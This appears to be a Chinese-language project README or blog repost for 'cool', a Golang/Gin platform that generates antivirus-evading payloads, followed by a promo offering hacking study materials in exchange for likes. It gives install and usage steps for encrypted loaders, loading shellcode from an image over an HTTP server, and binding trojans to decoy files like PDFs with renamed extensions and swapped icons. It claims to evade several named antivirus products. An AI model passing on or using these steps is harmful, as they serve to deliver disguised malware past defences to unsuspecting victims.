Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式。
cool
时间线:
- Golang Gin 框架写的免杀平台- (2021.11.12)
- Golang Gin 框架写的免杀平台,更新捆绑免杀- (2021.11.20)
- 增加自定义捆绑,修复一个小bug- (2021.11.22)
- 上传"compile.exe_备份",在\service\executable\下,如果生成免杀是0kb的话就把原来的compile.exe删掉,把"compile.exe_备份"改成compile.exe,这样的话混淆效果会变差。。。但是至少能用了-(2021.11.25)
安装
- 安装Go环境,版本要1.17及以上;
- 如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:
- go env -w GO111MODULE=on
- go env -w GOPROXY=https://goproxy.io,direct
- 完毕后执行 go install mvdan.cc/garble@latest ;
- 下载本项目到D盘根目录,文件夹名字改为cool;
- 运行cool.exe;
- 访问 http://127.0.0.1:9000 。
使用
为减去浏览器扫描的时间,故生成的文件格式为txt,使用时只需要把后缀修改为前端提示的后缀就可以了。
1. 加密1
- 直接执行exe。
2. 加密2
- 直接执行exe。
3. 分离1(houqing)
- 用python起一个HTTP服务(python -m http.server 8080),
- 把图片放到起http服务的目录下,
- 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。
4. 分离2
上线方式1
- 用python起一个HTTP服务(python -m http.server 8080),
- 把图片放到起http服务的目录下,
- 执行exe 参数为http服务的图片路径(xxx.exe http://127.0.0.1:8080/a.jpg) 。
上线方式2
- 执行xxx.exe 参数为shellcode.txt里的内容 。
5. 捆绑上线
捆绑内置免杀马
- 填写信息(免杀方式、listeners或者shellcode等),
- 上传需要和木马捆绑的文件,
- 下载完毕后将后缀改为exe,
- 图标自行修改。
捆绑自定义木马
- 第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)
- 点击生成
目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。
网络安全工程师(白帽子)企业级学习路线
第一阶段:安全基础(入门)
第二阶段:Web渗透(初级网安工程师)
第三阶段:进阶部分(中级网络安全工程师)
如果你也想学习:黑客&网络安全的渗透攻防
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
在这里领取:
这个是我花了几天几夜自整理的最新最全网安学习资料包免费共享给你们,其中包含以下东西:
1.学习路线&职业规划
2.全套体系课&入门到精通
3.黑客电子书&面试资料
4.漏洞挖掘工具和学习文档
